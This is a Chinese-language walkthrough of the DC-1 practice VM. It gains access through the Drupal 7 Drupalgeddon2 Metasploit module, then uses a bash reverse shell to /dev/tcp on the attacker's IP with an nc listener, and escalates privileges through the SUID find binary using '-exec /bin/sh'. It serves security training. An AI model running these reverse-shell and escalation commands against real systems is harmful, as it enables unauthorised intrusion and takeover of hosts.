靶机DC系列 DC:1

DC:1

文章目录

  • DC:1
      • 信息收集
        • 端口IP信息
        • 网页信息
      • 漏洞利用
      • shell
      • 提权

信息收集

端口IP信息

使用arp-scan获得靶机ip
靶机DC系列 DC:1_第1张图片
使用nmap对端口进行详细扫描
靶机DC系列 DC:1_第2张图片
可以看到该目标机开放了三个端口
有ssh、http、rpcbind服务
其中rpcbind是拥有该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。
但是我们这个目标机是用不上的放弃该条路

网页信息

网站登录后发现是一个登录页面
靶机DC系列 DC:1_第3张图片
尝试弱口令失败
靶机DC系列 DC:1_第4张图片
再wappalyzer里发现该页面是用来drupal内容管理系统并且版本是7
靶机DC系列 DC:1_第5张图片
再kali使用msf查找是否存在漏洞
输入msfconsole进入msf模块
靶机DC系列 DC:1_第6张图片
使用search Drupal7进行搜索靶机DC系列 DC:1_第7张图片
说明存在漏洞

漏洞利用

第一个尝试过了无法使用那就使用第二个输入use exploit/unix/webapp/drupal_drupalgeddon2引用该模块
在这里插入图片描述
提示没有payload使用show payloads命令查看可以上什么payload
靶机DC系列 DC:1_第8张图片
一眼就看见了我们的老朋友
使用该payload 并用show option查看还有什么需要设置
set payload 18
靶机DC系列 DC:1_第9张图片
上面说我们执行需要设置目标机的ip我们设置一下
在这里插入图片描述
然后直接run
靶机DC系列 DC:1_第10张图片
我们进行shell可以看到已经进来了
靶机DC系列 DC:1_第11张图片

shell

在目标机写入反弹命令到/tmp下
echo “bash -c ‘bash -i >& /dev/tcp/10.4.7.3/10002 0>&1’” >/tmp/shell.sh
在这里插入图片描述
在kali开启nc
nc -lvvp 10002
靶机DC系列 DC:1_第12张图片
执行该脚本./tmp/shell.sh成功弹入
靶机DC系列 DC:1_第13张图片

提权

进来之后尝试sudo 无法使用
在这里插入图片描述
查找有suid权限的文件
find / -perm -u=s -type f 2>/dev/null
靶机DC系列 DC:1_第14张图片
直接find提权find /tmp -name shell.sh -exec "/bin/sh" \;
靶机DC系列 DC:1_第15张图片
最终拿到flag
靶机DC系列 DC:1_第16张图片

你可能感兴趣的:(靶机,渗透,网络安全,web安全,DC)